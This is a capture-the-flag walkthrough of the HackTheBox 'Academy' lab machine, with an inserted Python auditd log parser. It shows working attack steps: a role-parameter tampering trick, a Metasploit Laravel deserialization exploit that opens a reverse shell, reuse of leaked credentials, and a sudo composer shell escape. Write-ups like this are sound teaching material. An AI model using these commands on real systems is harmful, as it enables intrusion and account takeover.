HackTheBox: (“Academy”) — Walkthrough
Hi people :D
Today we’ll solve the “Academy” machine from HackTheBox, an easy machine with good ideas. Let’s get started.
Enumeration
— — — — — — —
Start with Nmap
nmap -A 10.10.10.215
We have two open ports, 22 (SSH) and 80 (HTTP). Add the machine IP as academy.htb to the /etc/hosts file.
Web Enumeration
— — — — — — — —
Now go to your browser and navigate to http://academy.htb
There is a register function, so let’s open Burp Suite and create an account.
I noticed that there is a roleid parameter in the registration request. If you are familiar with web pentesting, you know that this kind of parameter is often vulnerable to parameter-based access control issues: the server trusts the role value the client sends instead of assigning it itself.
Now change the roleid value to 1, then log in with your account.
After logging in, you’ll be redirected to a page that looks like the original HackTheBox Academy site. Run any directory brute-forcing tool such as dirsearch and you’ll find the admin directory.
./dirsearch.py -u http://academy.htb/ -e "*" -x 500-599,400-499
Navigate to the admin directory; you will find useful information such as a dev domain and two users (cry0l1t3 & mrb3n).
Add dev-staging-01.academy.htb to /etc/hosts, then open it.
Scroll down a bit and you will see that the website uses Laravel; you will also find the APP_KEY.
Exploitation
— — — — — —
I searched for any exploit for Laravel and found this Metasploit module.
Let’s try this module: first set the module options, then run it.
- use exploit/unix/http/laravel_token_unserialize_exec
- set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
- set RHOSTS 10.10.10.215
- set VHOST dev-staging-01.academy.htb
- set LHOST tun0
- exploit
And we got a www-data shell ☺
User Flag
— — — — —
Make some improvements to our shell with:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
Then run ls -la to show hidden files; we find a .env file, so let’s read it.
We find a password (mySup3rP4s5w0rd!!). Try this password with the cry0l1t3 user and we get a shell.
Simply go to the home directory and read user.txt to get the flag.
Root Flag
— — — — —
Unfortunately, we cannot run sudo -l with our privileges.
After some searching, I found 4 log files in the /var/logs/audit directory.
These files contain a huge amount of data, which makes reading them a waste of time, so I tried to grep for important strings like Password, pass, admin, sudo, su, etc.
I noticed that these files contain a “comm=” string followed by a command, like this: comm=“whoami”. This made the grep process much faster.
I tried some strings and found some hex data when I grepped for the su command:
6D7262336E5F41634064336D79210A
Convert this data from hex to ASCII using any online converter site.
We find another password (mrb3n_Ac@d3my!) that seems to be mrb3n’s password.
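The audit trail does not protect those keystrokes, it only hex-encodes them. As an added example (not from the writeup), here is a small Python parser that splits auditd records into key=value fields and decodes hex-encoded string values, the same transformation the online converter does; the log lines are constructed for the example and the hex payload is the one quoted above.

```python
import re
from typing import Dict, List

# Constructed sample records in Linux auditd format (not taken from the machine).
# auditd writes a string value containing spaces, quotes or control characters as
# a bare hex token instead of a quoted string; TTY keystroke records use that form.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1601900000.100:200): tty pid=2516 uid=1002 auid=1002 ses=3 major=4 minor=1 comm="bash" data=6C73202D6C610A
type=TTY msg=audit(1601900010.200:201): tty pid=2520 uid=1002 auid=1002 ses=3 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_AUTH msg=audit(1601900010.300:202): pid=2520 uid=1002 auid=1002 ses=3 msg='op=PAM:authentication acct="mrb3n" exe="/usr/bin/su" res=success'
"""

# key=value pairs; a value is double-quoted, single-quoted, or a bare token.
FIELD_RE = re.compile(r"(\w+)=(\"[^\"]*\"|'[^']*'|\S+)")
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
# String fields that auditd hex-encodes when unquoted (extend as needed).
# Numeric fields such as pid/uid are never hex, so they are left untouched.
HEX_FIELDS = {"data", "proctitle", "comm", "exe", "acct", "cmd", "name"}

def decode_value(field: str, raw: str) -> str:
    """Return one audit field value as plain text: strip quotes from a quoted
    value, hex-decode a bare hex token of a string field, else return as-is."""
    if len(raw) >= 2 and raw[0] in "\"'" and raw[-1] == raw[0]:
        return raw[1:-1]
    if field in HEX_FIELDS and HEX_RE.match(raw):
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw

def parse_audit_line(line: str) -> Dict[str, str]:
    """Split one audit record into a dict of decoded fields."""
    return {key: decode_value(key, val) for key, val in FIELD_RE.findall(line)}

def tty_input_for_command(log: str, command: str) -> List[str]:
    """Decoded keystrokes from TTY records whose comm= equals `command`.
    Everything returned here was stored in clear (hex is not encryption), which
    is why audit logs must be readable only by root or the audit group."""
    hits = []
    for line in log.splitlines():
        rec = parse_audit_line(line)
        if rec.get("type") == "TTY" and rec.get("comm") == command and "data" in rec:
            hits.append(rec["data"].rstrip("\n"))
    return hits

if __name__ == "__main__":
    for keystrokes in tty_input_for_command(SAMPLE_AUDIT_LOG, "su"):
        print(repr(keystrokes))
```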
Now try the sudo -l command.
We can run composer as root without a password.
Once I know what I can run with root privileges, I go directly to the GTFOBins website. After searching for composer sudo there, I found these commands.
Just copy & paste these commands:
- TF=$(mktemp -d)
- echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
- sudo composer --working-dir=$TF run-script x
After that we get a root shell. Simply read root.txt and congrats! ☺
Thanks for reading, and I hope this writeup was useful to you ❤